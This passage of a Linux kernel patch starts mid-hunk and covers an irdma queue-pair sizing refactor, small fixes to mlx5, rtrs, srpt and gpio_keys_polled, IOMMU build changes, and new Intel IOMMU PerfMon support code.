+-	irdma_get_wqe_shift(uk_attrs,
+-		uk_attrs->hw_rev >= IRDMA_GEN_2 ? ukinfo->max_sq_frag_cnt + 1 :
+-						  ukinfo->max_sq_frag_cnt,
+-		ukinfo->max_inline_data, &sqshift);
+-	status = irdma_get_sqdepth(uk_attrs, ukinfo->sq_size, sqshift,
+-				   &sqdepth);
++	status = irdma_uk_calc_depth_shift_sq(ukinfo, &ukinfo->sq_depth,
++					      &ukinfo->sq_shift);
+ 	if (status)
+ 		return status;
+ 
+-	if (uk_attrs->hw_rev == IRDMA_GEN_1)
+-		rqshift = IRDMA_MAX_RQ_WQE_SHIFT_GEN1;
+-	else
+-		irdma_get_wqe_shift(uk_attrs, ukinfo->max_rq_frag_cnt, 0,
+-				    &rqshift);
+-
+-	status = irdma_get_rqdepth(uk_attrs, ukinfo->rq_size, rqshift,
+-				   &rqdepth);
++	status = irdma_uk_calc_depth_shift_rq(ukinfo, &ukinfo->rq_depth,
++					      &ukinfo->rq_shift);
+ 	if (status)
+ 		return status;
+ 
+ 	iwqp->kqp.sq_wrid_mem =
+-		kcalloc(sqdepth, sizeof(*iwqp->kqp.sq_wrid_mem), GFP_KERNEL);
++		kcalloc(ukinfo->sq_depth, sizeof(*iwqp->kqp.sq_wrid_mem), GFP_KERNEL);
+ 	if (!iwqp->kqp.sq_wrid_mem)
+ 		return -ENOMEM;
+ 
+ 	iwqp->kqp.rq_wrid_mem =
+-		kcalloc(rqdepth, sizeof(*iwqp->kqp.rq_wrid_mem), GFP_KERNEL);
++		kcalloc(ukinfo->rq_depth, sizeof(*iwqp->kqp.rq_wrid_mem), GFP_KERNEL);
++
+ 	if (!iwqp->kqp.rq_wrid_mem) {
+ 		kfree(iwqp->kqp.sq_wrid_mem);
+ 		iwqp->kqp.sq_wrid_mem = NULL;
+@@ -622,7 +693,7 @@ static int irdma_setup_kmode_qp(struct irdma_device *iwdev,
+ 	ukinfo->sq_wrtrk_array = iwqp->kqp.sq_wrid_mem;
+ 	ukinfo->rq_wrid_array = iwqp->kqp.rq_wrid_mem;
+ 
+-	size = (sqdepth + rqdepth) * IRDMA_QP_WQE_MIN_SIZE;
++	size = (ukinfo->sq_depth + ukinfo->rq_depth) * IRDMA_QP_WQE_MIN_SIZE;
+ 	size += (IRDMA_SHADOW_AREA_SIZE << 3);
+ 
+ 	mem->size = ALIGN(size, 256);
+@@ -638,16 +709,18 @@ static int irdma_setup_kmode_qp(struct irdma_device *iwdev,
+ 
+ 	ukinfo->sq = mem->va;
+ 	info->sq_pa = mem->pa;
+-	ukinfo->rq = &ukinfo->sq[sqdepth];
+-	info->rq_pa = info->sq_pa + (sqdepth * IRDMA_QP_WQE_MIN_SIZE);
+-	ukinfo->shadow_area = ukinfo->rq[rqdepth].elem;
+-	info->shadow_area_pa = info->rq_pa + (rqdepth * IRDMA_QP_WQE_MIN_SIZE);
+-	ukinfo->sq_size = sqdepth >> sqshift;
+-	ukinfo->rq_size = rqdepth >> rqshift;
+-	ukinfo->qp_id = iwqp->ibqp.qp_num;
+-
+-	init_attr->cap.max_send_wr = (sqdepth - IRDMA_SQ_RSVD) >> sqshift;
+-	init_attr->cap.max_recv_wr = (rqdepth - IRDMA_RQ_RSVD) >> rqshift;
++	ukinfo->rq = &ukinfo->sq[ukinfo->sq_depth];
++	info->rq_pa = info->sq_pa + (ukinfo->sq_depth * IRDMA_QP_WQE_MIN_SIZE);
++	ukinfo->shadow_area = ukinfo->rq[ukinfo->rq_depth].elem;
++	info->shadow_area_pa =
++		info->rq_pa + (ukinfo->rq_depth * IRDMA_QP_WQE_MIN_SIZE);
++	ukinfo->sq_size = ukinfo->sq_depth >> ukinfo->sq_shift;
++	ukinfo->rq_size = ukinfo->rq_depth >> ukinfo->rq_shift;
++
++	iwqp->max_send_wr = (ukinfo->sq_depth - IRDMA_SQ_RSVD) >> ukinfo->sq_shift;
++	iwqp->max_recv_wr = (ukinfo->rq_depth - IRDMA_RQ_RSVD) >> ukinfo->rq_shift;
++	init_attr->cap.max_send_wr = iwqp->max_send_wr;
++	init_attr->cap.max_recv_wr = iwqp->max_recv_wr;
+ 
+ 	return 0;
+ }
+@@ -805,18 +878,14 @@ static int irdma_create_qp(struct ib_qp *ibqp,
+ 	struct irdma_device *iwdev = to_iwdev(ibpd->device);
+ 	struct irdma_pci_f *rf = iwdev->rf;
+ 	struct irdma_qp *iwqp = to_iwqp(ibqp);
+-	struct irdma_create_qp_req req = {};
+ 	struct irdma_create_qp_resp uresp = {};
+ 	u32 qp_num = 0;
+ 	int err_code;
+-	int sq_size;
+-	int rq_size;
+ 	struct irdma_sc_qp *qp;
+ 	struct irdma_sc_dev *dev = &rf->sc_dev;
+ 	struct irdma_uk_attrs *uk_attrs = &dev->hw_attrs.uk_attrs;
+ 	struct irdma_qp_init_info init_info = {};
+ 	struct irdma_qp_host_ctx_info *ctx_info;
+-	unsigned long flags;
+ 
+ 	err_code = irdma_validate_qp_attrs(init_attr, iwdev);
+ 	if (err_code)
+@@ -826,13 +895,10 @@ static int irdma_create_qp(struct ib_qp *ibqp,
+ 		      udata->outlen < IRDMA_CREATE_QP_MIN_RESP_LEN))
+ 		return -EINVAL;
+ 
+-	sq_size = init_attr->cap.max_send_wr;
+-	rq_size = init_attr->cap.max_recv_wr;
+-
+ 	init_info.vsi = &iwdev->vsi;
+ 	init_info.qp_uk_init_info.uk_attrs = uk_attrs;
+-	init_info.qp_uk_init_info.sq_size = sq_size;
+-	init_info.qp_uk_init_info.rq_size = rq_size;
++	init_info.qp_uk_init_info.sq_size = init_attr->cap.max_send_wr;
++	init_info.qp_uk_init_info.rq_size = init_attr->cap.max_recv_wr;
+ 	init_info.qp_uk_init_info.max_sq_frag_cnt = init_attr->cap.max_send_sge;
+ 	init_info.qp_uk_init_info.max_rq_frag_cnt = init_attr->cap.max_recv_sge;
+ 	init_info.qp_uk_init_info.max_inline_data = init_attr->cap.max_inline_data;
+@@ -874,7 +940,7 @@ static int irdma_create_qp(struct ib_qp *ibqp,
+ 	iwqp->host_ctx.size = IRDMA_QP_CTX_SIZE;
+ 
+ 	init_info.pd = &iwpd->sc_pd;
+-	init_info.qp_uk_init_info.qp_id = iwqp->ibqp.qp_num;
++	init_info.qp_uk_init_info.qp_id = qp_num;
+ 	if (!rdma_protocol_roce(&iwdev->ibdev, 1))
+ 		init_info.qp_uk_init_info.first_sq_wq = 1;
+ 	iwqp->ctx_info.qp_compl_ctx = (uintptr_t)qp;
+@@ -882,36 +948,9 @@ static int irdma_create_qp(struct ib_qp *ibqp,
+ 	init_waitqueue_head(&iwqp->mod_qp_waitq);
+ 
+ 	if (udata) {
+-		err_code = ib_copy_from_udata(&req, udata,
+-					      min(sizeof(req), udata->inlen));
+-		if (err_code) {
+-			ibdev_dbg(&iwdev->ibdev,
+-				  "VERBS: ib_copy_from_data fail\n");
+-			goto error;
+-		}
+-
+-		iwqp->ctx_info.qp_compl_ctx = req.user_compl_ctx;
+-		iwqp->user_mode = 1;
+-		if (req.user_wqe_bufs) {
+-			struct irdma_ucontext *ucontext =
+-				rdma_udata_to_drv_context(udata,
+-							  struct irdma_ucontext,
+-							  ibucontext);
+-
+-			init_info.qp_uk_init_info.legacy_mode = ucontext->legacy_mode;
+-			spin_lock_irqsave(&ucontext->qp_reg_mem_list_lock, flags);
+-			iwqp->iwpbl = irdma_get_pbl((unsigned long)req.user_wqe_bufs,
+-						    &ucontext->qp_reg_mem_list);
+-			spin_unlock_irqrestore(&ucontext->qp_reg_mem_list_lock, flags);
+-
+-			if (!iwqp->iwpbl) {
+-				err_code = -ENODATA;
+-				ibdev_dbg(&iwdev->ibdev, "VERBS: no pbl info\n");
+-				goto error;
+-			}
+-		}
+ 		init_info.qp_uk_init_info.abi_ver = iwpd->sc_pd.abi_ver;
+-		irdma_setup_virt_qp(iwdev, iwqp, &init_info);
++		err_code = irdma_setup_umode_qp(udata, iwdev, iwqp, &init_info,
++						init_attr);
+ 	} else {
+ 		INIT_DELAYED_WORK(&iwqp->dwork_flush, irdma_flush_worker);
+ 		init_info.qp_uk_init_info.abi_ver = IRDMA_ABI_VER;
+@@ -966,8 +1005,6 @@ static int irdma_create_qp(struct ib_qp *ibqp,
+ 	spin_lock_init(&iwqp->sc_qp.pfpdu.lock);
+ 	iwqp->sig_all = (init_attr->sq_sig_type == IB_SIGNAL_ALL_WR) ? 1 : 0;
+ 	rf->qp_table[qp_num] = iwqp;
+-	iwqp->max_send_wr = sq_size;
+-	iwqp->max_recv_wr = rq_size;
+ 
+ 	if (rdma_protocol_roce(&iwdev->ibdev, 1)) {
+ 		if (dev->ws_add(&iwdev->vsi, 0)) {
+@@ -988,8 +1025,8 @@ static int irdma_create_qp(struct ib_qp *ibqp,
+ 			if (rdma_protocol_iwarp(&iwdev->ibdev, 1))
+ 				uresp.lsmm = 1;
+ 		}
+-		uresp.actual_sq_size = sq_size;
+-		uresp.actual_rq_size = rq_size;
++		uresp.actual_sq_size = init_info.qp_uk_init_info.sq_size;
++		uresp.actual_rq_size = init_info.qp_uk_init_info.rq_size;
+ 		uresp.qp_id = qp_num;
+ 		uresp.qp_caps = qp->qp_uk.qp_caps;
+ 
+diff --git a/drivers/infiniband/hw/irdma/verbs.h b/drivers/infiniband/hw/irdma/verbs.h
+index 9f9e273bbff3e..0bc0d0faa0868 100644
+--- a/drivers/infiniband/hw/irdma/verbs.h
++++ b/drivers/infiniband/hw/irdma/verbs.h
+@@ -18,7 +18,8 @@ struct irdma_ucontext {
+ 	struct list_head qp_reg_mem_list;
+ 	spinlock_t qp_reg_mem_list_lock; /* protect QP memory list */
+ 	int abi_ver;
+-	bool legacy_mode;
++	u8 legacy_mode : 1;
++	u8 use_raw_attrs : 1;
+ };
+ 
+ struct irdma_pd {
+diff --git a/drivers/infiniband/hw/mlx5/devx.c b/drivers/infiniband/hw/mlx5/devx.c
+index f8e2baed27a5c..7013ce20549bd 100644
+--- a/drivers/infiniband/hw/mlx5/devx.c
++++ b/drivers/infiniband/hw/mlx5/devx.c
+@@ -2951,7 +2951,7 @@ DECLARE_UVERBS_NAMED_METHOD(
+ 	MLX5_IB_METHOD_DEVX_OBJ_MODIFY,
+ 	UVERBS_ATTR_IDR(MLX5_IB_ATTR_DEVX_OBJ_MODIFY_HANDLE,
+ 			UVERBS_IDR_ANY_OBJECT,
+-			UVERBS_ACCESS_WRITE,
++			UVERBS_ACCESS_READ,
+ 			UA_MANDATORY),
+ 	UVERBS_ATTR_PTR_IN(
+ 		MLX5_IB_ATTR_DEVX_OBJ_MODIFY_CMD_IN,
+diff --git a/drivers/infiniband/hw/mlx5/wr.c b/drivers/infiniband/hw/mlx5/wr.c
+index 855f3f4fefadd..737db67a9ce1d 100644
+--- a/drivers/infiniband/hw/mlx5/wr.c
++++ b/drivers/infiniband/hw/mlx5/wr.c
+@@ -78,7 +78,7 @@ static void set_eth_seg(const struct ib_send_wr *wr, struct mlx5_ib_qp *qp,
+ 		 */
+ 		copysz = min_t(u64, *cur_edge - (void *)eseg->inline_hdr.start,
+ 			       left);
+-		memcpy(eseg->inline_hdr.start, pdata, copysz);
++		memcpy(eseg->inline_hdr.data, pdata, copysz);
+ 		stride = ALIGN(sizeof(struct mlx5_wqe_eth_seg) -
+ 			       sizeof(eseg->inline_hdr.start) + copysz, 16);
+ 		*size += stride / 16;
+diff --git a/drivers/infiniband/ulp/rtrs/rtrs-clt-sysfs.c b/drivers/infiniband/ulp/rtrs/rtrs-clt-sysfs.c
+index d3c436ead6946..4aa80c9388f05 100644
+--- a/drivers/infiniband/ulp/rtrs/rtrs-clt-sysfs.c
++++ b/drivers/infiniband/ulp/rtrs/rtrs-clt-sysfs.c
+@@ -133,7 +133,7 @@ static ssize_t mpath_policy_store(struct device *dev,
+ 
+ 	/* distinguish "mi" and "min-latency" with length */
+ 	len = strnlen(buf, NAME_MAX);
+-	if (buf[len - 1] == '\n')
++	if (len && buf[len - 1] == '\n')
+ 		len--;
+ 
+ 	if (!strncasecmp(buf, "round-robin", 11) ||
+diff --git a/drivers/infiniband/ulp/srpt/ib_srpt.c b/drivers/infiniband/ulp/srpt/ib_srpt.c
+index cffa93f114a73..fd6c260d5857d 100644
+--- a/drivers/infiniband/ulp/srpt/ib_srpt.c
++++ b/drivers/infiniband/ulp/srpt/ib_srpt.c
+@@ -3209,7 +3209,6 @@ static int srpt_add_one(struct ib_device *device)
+ 
+ 	INIT_IB_EVENT_HANDLER(&sdev->event_handler, sdev->device,
+ 			      srpt_event_handler);
+-	ib_register_event_handler(&sdev->event_handler);
+ 
+ 	for (i = 1; i <= sdev->device->phys_port_cnt; i++) {
+ 		sport = &sdev->port[i - 1];
+@@ -3232,6 +3231,7 @@ static int srpt_add_one(struct ib_device *device)
+ 		}
+ 	}
+ 
++	ib_register_event_handler(&sdev->event_handler);
+ 	spin_lock(&srpt_dev_lock);
+ 	list_add_tail(&sdev->list, &srpt_dev_list);
+ 	spin_unlock(&srpt_dev_lock);
+@@ -3242,7 +3242,6 @@ static int srpt_add_one(struct ib_device *device)
+ 
+ err_port:
+ 	srpt_unregister_mad_agent(sdev, i);
+-	ib_unregister_event_handler(&sdev->event_handler);
+ err_cm:
+ 	if (sdev->cm_id)
+ 		ib_destroy_cm_id(sdev->cm_id);
+diff --git a/drivers/input/keyboard/gpio_keys_polled.c b/drivers/input/keyboard/gpio_keys_polled.c
+index c3937d2fc7446..a0f9978c68f55 100644
+--- a/drivers/input/keyboard/gpio_keys_polled.c
++++ b/drivers/input/keyboard/gpio_keys_polled.c
+@@ -319,12 +319,10 @@ static int gpio_keys_polled_probe(struct platform_device *pdev)
+ 
+ 			error = devm_gpio_request_one(dev, button->gpio,
+ 					flags, button->desc ? : DRV_NAME);
+-			if (error) {
+-				dev_err(dev,
+-					"unable to claim gpio %u, err=%d\n",
+-					button->gpio, error);
+-				return error;
+-			}
++			if (error)
++				return dev_err_probe(dev, error,
++						     "unable to claim gpio %u\n",
++						     button->gpio);
+ 
+ 			bdata->gpiod = gpio_to_desc(button->gpio);
+ 			if (!bdata->gpiod) {
+diff --git a/drivers/iommu/Kconfig b/drivers/iommu/Kconfig
+index dc5f7a156ff5e..dc19e7fb07cfe 100644
+--- a/drivers/iommu/Kconfig
++++ b/drivers/iommu/Kconfig
+@@ -192,7 +192,7 @@ source "drivers/iommu/intel/Kconfig"
+ config IRQ_REMAP
+ 	bool "Support for Interrupt Remapping"
+ 	depends on X86_64 && X86_IO_APIC && PCI_MSI && ACPI
+-	select DMAR_TABLE
++	select DMAR_TABLE if INTEL_IOMMU
+ 	help
+ 	  Supports Interrupt remapping for IO-APIC and MSI devices.
+ 	  To use x2apic mode in the CPU's which support x2APIC enhancements or
+diff --git a/drivers/iommu/amd/init.c b/drivers/iommu/amd/init.c
+index f6e64c9858021..cc94ac6662339 100644
+--- a/drivers/iommu/amd/init.c
++++ b/drivers/iommu/amd/init.c
+@@ -2047,6 +2047,9 @@ static int __init iommu_init_pci(struct amd_iommu *iommu)
+ 	/* Prevent binding other PCI device drivers to IOMMU devices */
+ 	iommu->dev->match_driver = false;
+ 
++	/* ACPI _PRT won't have an IRQ for IOMMU */
++	iommu->dev->irq_managed = 1;
++
+ 	pci_read_config_dword(iommu->dev, cap_ptr + MMIO_CAP_HDR_OFFSET,
+ 			      &iommu->cap);
+ 
+diff --git a/drivers/iommu/intel/Kconfig b/drivers/iommu/intel/Kconfig
+index b7dff5092fd21..12e1e90fdae13 100644
+--- a/drivers/iommu/intel/Kconfig
++++ b/drivers/iommu/intel/Kconfig
+@@ -96,4 +96,15 @@ config INTEL_IOMMU_SCALABLE_MODE_DEFAULT_ON
+ 	  passing intel_iommu=sm_on to the kernel. If not sure, please use
+ 	  the default value.
+ 
++config INTEL_IOMMU_PERF_EVENTS
++	def_bool y
++	bool "Intel IOMMU performance events"
++	depends on INTEL_IOMMU && PERF_EVENTS
++	help
++	  Selecting this option will enable the performance monitoring
++	  infrastructure in the Intel IOMMU. It collects information about
++	  key events occurring during operation of the remapping hardware,
++	  to aid performance tuning and debug. These are available on modern
++	  processors which support Intel VT-d 4.0 and later.
++
+ endif # INTEL_IOMMU
+diff --git a/drivers/iommu/intel/Makefile b/drivers/iommu/intel/Makefile
+index fa0dae16441cb..29d26a4371327 100644
+--- a/drivers/iommu/intel/Makefile
++++ b/drivers/iommu/intel/Makefile
+@@ -5,4 +5,7 @@ obj-$(CONFIG_DMAR_TABLE) += trace.o cap_audit.o
+ obj-$(CONFIG_DMAR_PERF) += perf.o
+ obj-$(CONFIG_INTEL_IOMMU_DEBUGFS) += debugfs.o
+ obj-$(CONFIG_INTEL_IOMMU_SVM) += svm.o
++ifdef CONFIG_INTEL_IOMMU
+ obj-$(CONFIG_IRQ_REMAP) += irq_remapping.o
++endif
++obj-$(CONFIG_INTEL_IOMMU_PERF_EVENTS) += perfmon.o
+diff --git a/drivers/iommu/intel/dmar.c b/drivers/iommu/intel/dmar.c
+index 418af1db0192d..4759f79ad7b94 100644
+--- a/drivers/iommu/intel/dmar.c
++++ b/drivers/iommu/intel/dmar.c
+@@ -34,6 +34,7 @@
+ #include "../irq_remapping.h"
+ #include "perf.h"
+ #include "trace.h"
++#include "perfmon.h"
+ 
+ typedef int (*dmar_res_handler_t)(struct acpi_dmar_header *, void *);
+ struct dmar_res_callback {
+@@ -1104,6 +1105,9 @@ static int alloc_iommu(struct dmar_drhd_unit *drhd)
+ 	if (sts & DMA_GSTS_QIES)
+ 		iommu->gcmd |= DMA_GCMD_QIE;
+ 
++	if (alloc_iommu_pmu(iommu))
++		pr_debug("Cannot alloc PMU for iommu (seq_id = %d)\n", iommu->seq_id);
++
+ 	raw_spin_lock_init(&iommu->register_lock);
+ 
+ 	/*
+@@ -1131,6 +1135,7 @@ static int alloc_iommu(struct dmar_drhd_unit *drhd)
+ err_sysfs:
+ 	iommu_device_sysfs_remove(&iommu->iommu);
+ err_unmap:
++	free_iommu_pmu(iommu);
+ 	unmap_iommu(iommu);
+ error_free_seq_id:
+ 	ida_free(&dmar_seq_ids, iommu->seq_id);
+@@ -1146,6 +1151,8 @@ static void free_iommu(struct intel_iommu *iommu)
+ 		iommu_device_sysfs_remove(&iommu->iommu);
+ 	}
+ 
++	free_iommu_pmu(iommu);
++
+ 	if (iommu->irq) {
+ 		if (iommu->pr_irq) {
+ 			free_irq(iommu->pr_irq, iommu);
+diff --git a/drivers/iommu/intel/iommu.h b/drivers/iommu/intel/iommu.h
+index c99cb715bd9a2..c1348bedab3b3 100644
+--- a/drivers/iommu/intel/iommu.h
++++ b/drivers/iommu/intel/iommu.h
+@@ -125,6 +125,11 @@
+ #define DMAR_MTRR_PHYSMASK8_REG 0x208
+ #define DMAR_MTRR_PHYSBASE9_REG 0x210
+ #define DMAR_MTRR_PHYSMASK9_REG 0x218
++#define DMAR_PERFCAP_REG	0x300
++#define DMAR_PERFCFGOFF_REG	0x310
++#define DMAR_PERFOVFOFF_REG	0x318
++#define DMAR_PERFCNTROFF_REG	0x31c
++#define DMAR_PERFEVNTCAP_REG	0x380
+ #define DMAR_VCCAP_REG		0xe30 /* Virtual command capability register */
+ #define DMAR_VCMD_REG		0xe00 /* Virtual command register */
+ #define DMAR_VCRSP_REG		0xe10 /* Virtual command response register */
+@@ -148,6 +153,7 @@
+  */
+ #define cap_esrtps(c)		(((c) >> 63) & 1)
+ #define cap_esirtps(c)		(((c) >> 62) & 1)
++#define cap_ecmds(c)		(((c) >> 61) & 1)
+ #define cap_fl5lp_support(c)	(((c) >> 60) & 1)
+ #define cap_pi_support(c)	(((c) >> 59) & 1)
+ #define cap_fl1gp_support(c)	(((c) >> 56) & 1)
+@@ -179,7 +185,8 @@
+  * Extended Capability Register
+  */
+ 
+-#define	ecap_rps(e)		(((e) >> 49) & 0x1)
++#define ecap_pms(e)		(((e) >> 51) & 0x1)
++#define ecap_rps(e)		(((e) >> 49) & 0x1)
+ #define ecap_smpwc(e)		(((e) >> 48) & 0x1)
+ #define ecap_flts(e)		(((e) >> 47) & 0x1)
+ #define ecap_slts(e)		(((e) >> 46) & 0x1)
+@@ -210,6 +217,22 @@
+ #define ecap_max_handle_mask(e) (((e) >> 20) & 0xf)
+ #define ecap_sc_support(e)	(((e) >> 7) & 0x1) /* Snooping Control */
+ 
++/*
++ * Decoding Perf Capability Register
++ */
++#define pcap_num_cntr(p)	((p) & 0xffff)
++#define pcap_cntr_width(p)	(((p) >> 16) & 0x7f)
++#define pcap_num_event_group(p)	(((p) >> 24) & 0x1f)
++#define pcap_filters_mask(p)	(((p) >> 32) & 0x1f)
++#define pcap_interrupt(p)	(((p) >> 50) & 0x1)
++/* The counter stride is calculated as 2 ^ (x+10) bytes */
++#define pcap_cntr_stride(p)	(1ULL << ((((p) >> 52) & 0x7) + 10))
++
++/*
++ * Decoding Perf Event Capability Register
++ */
++#define pecap_es(p)		((p) & 0xfffffff)
++
+ /* Virtual command interface capability */
+ #define vccap_pasid(v)		(((v) & DMA_VCS_PAS)) /* PASID allocation */
+ 
+@@ -561,6 +584,22 @@ struct dmar_domain {
+ 					   iommu core */
+ };
+ 
++struct iommu_pmu {
++	struct intel_iommu	*iommu;
++	u32			num_cntr;	/* Number of counters */
++	u32			num_eg;		/* Number of event group */
++	u32			cntr_width;	/* Counter width */
++	u32			cntr_stride;	/* Counter Stride */
++	u32			filter;		/* Bitmask of filter support */
++	void __iomem		*base;		/* the PerfMon base address */
++	void __iomem		*cfg_reg;	/* counter configuration base address */
++	void __iomem		*cntr_reg;	/* counter 0 address*/
++	void __iomem		*overflow;	/* overflow status register */
++
++	u64			*evcap;		/* Indicates all supported events */
++	u32			**cntr_evcap;	/* Supported events of each counter. */
++};
++
+ struct intel_iommu {
+ 	void __iomem	*reg; /* Pointer to hardware regs, virtual addr */
+ 	u64 		reg_phys; /* physical address of hw register set */
+@@ -608,6 +647,8 @@ struct intel_iommu {
+ 
+ 	struct dmar_drhd_unit *drhd;
+ 	void *perf_statistic;
++
++	struct iommu_pmu *pmu;
+ };
+ 
+ /* PCI domain-device relationship */
+diff --git a/drivers/iommu/intel/pasid.c b/drivers/iommu/intel/pasid.c
+index 3f03039e5cce5..32432d82d7744 100644
+--- a/drivers/iommu/intel/pasid.c
++++ b/drivers/iommu/intel/pasid.c
+@@ -435,6 +435,9 @@ devtlb_invalidation_with_pasid(struct intel_iommu *iommu,
+ 	if (!info || !info->ats_enabled)
+ 		return;
+ 
++	if (pci_dev_is_disconnected(to_pci_dev(dev)))
++		return;
++
+ 	sid = info->bus << 8 | info->devfn;
+ 	qdep = info->ats_qdep;
+ 	pfsid = info->pfsid;
+diff --git a/drivers/iommu/intel/perfmon.c b/drivers/iommu/intel/perfmon.c
+new file mode 100644
+index 0000000000000..db5791a544551
+--- /dev/null
++++ b/drivers/iommu/intel/perfmon.c
+@@ -0,0 +1,172 @@
++// SPDX-License-Identifier: GPL-2.0-only
++/*
++ * Support Intel IOMMU PerfMon
++ * Copyright(c) 2023 Intel Corporation.
++ */
++#define pr_fmt(fmt)	"DMAR: " fmt
++#define dev_fmt(fmt)	pr_fmt(fmt)
++
++#include <linux/dmar.h>
++#include "iommu.h"
++#include "perfmon.h"
++
++static inline void __iomem *
++get_perf_reg_address(struct intel_iommu *iommu, u32 offset)
++{
++	u32 off = dmar_readl(iommu->reg + offset);
++
++	return iommu->reg + off;
++}
++
++int alloc_iommu_pmu(struct intel_iommu *iommu)
++{
++	struct iommu_pmu *iommu_pmu;
++	int i, j, ret;
++	u64 perfcap;
++	u32 cap;
++
++	if (!ecap_pms(iommu->ecap))
++		return 0;
++
++	/* The IOMMU PMU requires the ECMD support as well */
++	if (!cap_ecmds(iommu->cap))
++		return -ENODEV;
++
++	perfcap = dmar_readq(iommu->reg + DMAR_PERFCAP_REG);
++	/* The performance monitoring is not supported. */
++	if (!perfcap)
++		return -ENODEV;
++
++	/* Sanity check for the number of the counters and event groups */
++	if (!pcap_num_cntr(perfcap) || !pcap_num_event_group(perfcap))
++		return -ENODEV;
++
++	/* The interrupt on overflow is required */
++	if (!pcap_interrupt(perfcap))
++		return -ENODEV;
++
++	iommu_pmu = kzalloc(sizeof(*iommu_pmu), GFP_KERNEL);
++	if (!iommu_pmu)
++		return -ENOMEM;
++
++	iommu_pmu->num_cntr = pcap_num_cntr(perfcap);
++	iommu_pmu->cntr_width = pcap_cntr_width(perfcap);
++	iommu_pmu->filter = pcap_filters_mask(perfcap);
++	iommu_pmu->cntr_stride = pcap_cntr_stride(perfcap);
++	iommu_pmu->num_eg = pcap_num_event_group(perfcap);
++
++	iommu_pmu->evcap = kcalloc(iommu_pmu->num_eg, sizeof(u64), GFP_KERNEL);
++	if (!iommu_pmu->evcap) {
++		ret = -ENOMEM;
++		goto free_pmu;
++	}
++
++	/* Parse event group capabilities */
++	for (i = 0; i < iommu_pmu->num_eg; i++) {
++		u64 pcap;
++
++		pcap = dmar_readq(iommu->reg + DMAR_PERFEVNTCAP_REG +
++				  i * IOMMU_PMU_CAP_REGS_STEP);
++		iommu_pmu->evcap[i] = pecap_es(pcap);
++	}
++
++	iommu_pmu->cntr_evcap = kcalloc(iommu_pmu->num_cntr, sizeof(u32 *), GFP_KERNEL);
++	if (!iommu_pmu->cntr_evcap) {
++		ret = -ENOMEM;
++		goto free_pmu_evcap;
++	}
++	for (i = 0; i < iommu_pmu->num_cntr; i++) {
++		iommu_pmu->cntr_evcap[i] = kcalloc(iommu_pmu->num_eg, sizeof(u32), GFP_KERNEL);
++		if (!iommu_pmu->cntr_evcap[i]) {
++			ret = -ENOMEM;
++			goto free_pmu_cntr_evcap;
++		}
++		/*
++		 * Set to the global capabilities, will adjust according
++		 * to per-counter capabilities later.
++		 */
++		for (j = 0; j < iommu_pmu->num_eg; j++)
++			iommu_pmu->cntr_evcap[i][j] = (u32)iommu_pmu->evcap[j];
++	}
++
++	iommu_pmu->cfg_reg = get_perf_reg_address(iommu, DMAR_PERFCFGOFF_REG);
++	iommu_pmu->cntr_reg = get_perf_reg_address(iommu, DMAR_PERFCNTROFF_REG);
++	iommu_pmu->overflow = get_perf_reg_address(iommu, DMAR_PERFOVFOFF_REG);
++
++	/*
++	 * Check per-counter capabilities. All counters should have the
++	 * same capabilities on Interrupt on Overflow Support and Counter
++	 * Width.
++	 */
++	for (i = 0; i < iommu_pmu->num_cntr; i++) {
++		cap = dmar_readl(iommu_pmu->cfg_reg +
++				 i * IOMMU_PMU_CFG_OFFSET +
++				 IOMMU_PMU_CFG_CNTRCAP_OFFSET);
++		if (!iommu_cntrcap_pcc(cap))
++			continue;
++
++		/*
++		 * It's possible that some counters have a different
++		 * capability because of e.g., HW bug. Check the corner
++		 * case here and simply drop those counters.
++		 */
++		if ((iommu_cntrcap_cw(cap) != iommu_pmu->cntr_width) ||
++		    !iommu_cntrcap_ios(cap)) {
++			iommu_pmu->num_cntr = i;
++			pr_warn("PMU counter capability inconsistent, counter number reduced to %d\n",
++				iommu_pmu->num_cntr);
++		}
++
++		/* Clear the pre-defined events group */
++		for (j = 0; j < iommu_pmu->num_eg; j++)
++			iommu_pmu->cntr_evcap[i][j] = 0;
++
++		/* Override with per-counter event capabilities */
++		for (j = 0; j < iommu_cntrcap_egcnt(cap); j++) {
++			cap = dmar_readl(iommu_pmu->cfg_reg + i * IOMMU_PMU_CFG_OFFSET +
++					 IOMMU_PMU_CFG_CNTREVCAP_OFFSET +
++					 (j * IOMMU_PMU_OFF_REGS_STEP));
++			iommu_pmu->cntr_evcap[i][iommu_event_group(cap)] = iommu_event_select(cap);
++			/*
++			 * Some events may only be supported by a specific counter.
++			 * Track them in the evcap as well.
++			 */
++			iommu_pmu->evcap[iommu_event_group(cap)] |= iommu_event_select(cap);
++		}
++	}
++
++	iommu_pmu->iommu = iommu;
++	iommu->pmu = iommu_pmu;
++
++	return 0;
++
++free_pmu_cntr_evcap:
++	for (i = 0; i < iommu_pmu->num_cntr; i++)
++		kfree(iommu_pmu->cntr_evcap[i]);
++	kfree(iommu_pmu->cntr_evcap);
++free_pmu_evcap:
++	kfree(iommu_pmu->evcap);
++free_pmu:
++	kfree(iommu_pmu);
++
++	return ret;
++}
++
++void free_iommu_pmu(struct intel_iommu *iommu)
++{
++	struct iommu_pmu *iommu_pmu = iommu->pmu;
++
++	if (!iommu_pmu)
++		return;
++
++	if (iommu_pmu->evcap) {
++		int i;
++
++		for (i = 0; i < iommu_pmu->num_cntr; i++)
++			kfree(iommu_pmu->cntr_evcap[i]);
++		kfree(iommu_pmu->cntr_evcap);
++	}
++	kfree(iommu_pmu->evcap);
++	kfree(iommu_pmu);
++	iommu->pmu = NULL;
++}
+diff --git a/drivers/iommu/intel/perfmon.h b/drivers/iommu/intel/perfmon.h
+new file mode 100644
+index 0000000000000..4b0d9c1fea6ff
+--- /dev/null
++++ b/drivers/iommu/intel/perfmon.h
+@@ -0,0 +1,40 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++
++/*
++ * PERFCFGOFF_REG, PERFFRZOFF_REG
++ * PERFOVFOFF_REG, PERFCNTROFF_REG
++ */
++#define IOMMU_PMU_NUM_OFF_REGS			4
++#define IOMMU_PMU_OFF_REGS_STEP			4
++
++#define IOMMU_PMU_CFG_OFFSET			0x100
++#define IOMMU_PMU_CFG_CNTRCAP_OFFSET		0x80
++#define IOMMU_PMU_CFG_CNTREVCAP_OFFSET		0x84
++#define IOMMU_PMU_CFG_SIZE			0x8
++#define IOMMU_PMU_CFG_FILTERS_OFFSET		0x4
++
++#define IOMMU_PMU_CAP_REGS_STEP			8
++
++#define iommu_cntrcap_pcc(p)			((p) & 0x1)
++#define iommu_cntrcap_cw(p)			(((p) >> 8) & 0xff)
++#define iommu_cntrcap_ios(p)			(((p) >> 16) & 0x1)
